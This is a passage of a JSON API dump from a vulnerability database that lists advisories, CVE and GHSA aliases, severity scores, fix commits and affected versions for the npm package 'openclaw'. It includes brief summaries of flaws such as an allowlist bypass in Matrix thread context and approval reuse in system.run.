ben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35662","GHSA-x2cm-hg9c-mf5w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1728-wc17-dud6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89969?format=json","vulnerability_id":"VCID-1j3m-fecr-f7cn","summary":"OpenClaw: Matrix thread root and reply context bypass sender allowlist\n## Summary\nMatrix thread root and reply context bypass sender allowlist\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28 Matrix because fetched thread-root/reply context bypasses sender allowlists, with unreleased mainline filtering fix.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8a563d603b70ef6338915f0527bee87282c3bad5` — 2026-03-31T17:09:03+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41376","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04376","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.0439","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04402","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41376"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8a563d603b70ef6338915f0527bee87282c3bad5","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:35Z/"}],"url":"https://github.com/openclaw/openclaw/commit/8a563d603b70ef6338915f0527bee87282c3bad5"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rg8m-3943-vm6q","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:35Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rg8m-3943-vm6q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41376","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41376"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-matrix-thread-context-allowlist-bypass-via-sender-validation","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:35Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-matrix-thread-context-allowlist-bypass-via-sender-validation"},{"reference_url":"https://github.com/advisories/GHSA-rg8m-3943-vm6q","reference_id":"GHSA-rg8m-3943-vm6q","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rg8m-3943-vm6q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41376","GHSA-rg8m-3943-vm6q"],"risk_score":3.0,"exploitability":"0.5","weighted_severity":"5.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1j3m-fecr-f7cn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91324?format=json","vulnerability_id":"VCID-1kk2-t48u-zkb2","summary":"Duplicate Advisory: OpenClaw Node system.run approval context-binding weakness in approval-enabled host=node flows\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-hjvp-qhm6-wrh2. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.26 contain an approval context-binding weakness in system.run execution flows with host=node that allows reuse of previously approved requests with modified environment variables. Attackers with access to an approval id can exploit this by reusing an approval with changed env input, bypassing execution-integrity controls in approval-enabled workflows.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/10481097f8e6dd0346db9be0b5f27570e1bdfcfa","reference_id":"","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/10481097f8e6dd0346db9be0b5f27570e1bdfcfa"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-approval-context-binding-weakness-in-system-run-via-host-node","reference_id":"","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-approval-context-binding-weakness-in-system-run-via-host-node"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32058","reference_id":"CVE-2026-32058","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32058"},{"reference_url":"https://github.com/advisories/GHSA-cjq8-m7wj-xmq9","reference_id":"GHSA-cjq8-m7wj-xmq9","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cjq8-m7wj-xmq9"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hjvp-qhm6-wrh2","reference_id":"GHSA-hjvp-qhm6-wrh2","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hjvp-qhm6-wrh2"}],"fixed_packages":[],"aliases":["GHSA-cjq8-m7wj-xmq9"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1kk2-t48u-zkb2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90837?format=json","vulnerability_id":"VCID-1p3b-pfnn-x7ad","summary":"Duplicate Advisory: OpenClaw's device removal and token revocation do not terminate active WebSocket sessions\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-2pr2-hcv6-7gwv. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 fails to disconnect active WebSocket sessions when devices are removed or tokens are revoked. Attackers with revoked credentials can maintain unauthorized access through existing live sessions until forced reconnection.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34503","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34503"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation"},{"reference_url":"https://github.com/advisories/GHSA-89hr-6x2p-8xjv","reference_id":"GHSA-89hr-6x2p-8xjv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-89hr-6x2p-8xjv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{